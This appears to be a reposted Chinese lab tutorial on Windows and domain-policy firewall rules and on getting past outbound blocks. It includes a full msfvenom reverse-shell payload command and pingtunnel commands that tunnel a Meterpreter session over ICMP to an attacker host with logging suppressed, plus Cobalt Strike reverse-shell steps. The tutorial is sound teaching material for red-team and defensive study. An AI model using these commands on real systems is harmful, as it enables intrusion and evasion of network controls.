案例一: 单机-防火墙-限制端口\协议出入站
入站是指别人主动来连接/访问你
在一个单机系统当中只启动一个共用防火墙,剩下都关闭
启动网站服务,当这个启动的时候,curl访问网站失败
而当关闭入站连接的时候,网站又会重现显示,这是入站的时候被阻止了
而出站是自己主动的去访问别人,windows防火墙出站默认是允许的
这里制作一个msf木马进行上传
msf开启监听
不设置规则的时候这个时候运行木马是可以进行连接的
设置一个出站限制
设置端口
设置规则
设置应用的防火墙范围
设置名称
这个时候运行没有任何反应
这样也只是禁用了一个端口,假如别人用的是4444端口,这里尝试修改禁止所有端口出站
自然就无法连接msf了
案例二:不出网的解决思路
入站连接
出站被限制死了,但是入站没有,可以主动连接木马
采用 windows/meterpreter/bind_tcp就是主动进行正向连接(入站)
生成正向连接的木马进行上传
设置模块,以及远程地址,运行木马,等待正向链接
隧道技术
限制了tcp协议,但是这些协议是向下兼容的,限制了tcp,也并非就限制了网络层以下类似icmp等协议
这里设置禁用所有tcp协议
去访问百度的时候会发现,浏览器无法访问,但是可以ping通
因为浏览器走的协议是http协议,而ping协议走的是icmp协议,所以隧道的思路就是把tcp协议利用icmp等等别的协议进行出网转发
案例三:域控-防火墙-组策略对象同步
在域控主机中打开组策略管理
找到域然后新建连接
配置该连接,右键点击配置
配置防火墙策略,域,专用,公用全部设置开启
域内主机,防火墙初始状态
更新组策略的命令
gpupdate/force
现在主机状态
也可以采用重启或者强制进行重置
配置禁止出网的规则
三个网络都配置,命名为no
尝试更新
案例四:域控-防火墙-组策略不出网上线
两种情况
这里目前是有网络,但是tcp封杀第二种情况,用的隧道技术
msf
首先先生成一个msf木马,生成的时候把地址设置为127.0.0.1,反弹给自己的3333端口
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe -o msf.exe
设置msf进行监听
这里需要把3333端口通过icmp协议转发到这个攻击主机的4444端口用到的项目地址
GitHub - esrrhs/pingtunnel: Pingtunnel is a tool that send TCP/UDP traffic over ICMP
下载这两个版本
linux传到攻击主机,windows传到被控主机
kali开启隧道用来接收别人通过icmp传给自己的,传过来将其又转换为tcp端口(sudo权限)
sudo ./pingtunnel -type server
windows被控主机开启工具,将自己的3333端口监听发送给攻击主机的4444端口(需要管理员权限)noprint nolog是指不要输出日志
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.172.132 -t 192.168.172.132:4444 -tcp 1 -noprint 1 -nolog 1
这个时候再运行木马,成功上线
cs
设置反弹给自己的监听模块
利用这个监听器生成一个木马
再设置一个接收反弹信息的监听器
windows通过icmp反弹5555端口
kali开启隧道
运行木马,成功反弹shell
版权归原作者 xiaojiesec 所有, 如有侵权,请联系我们删除。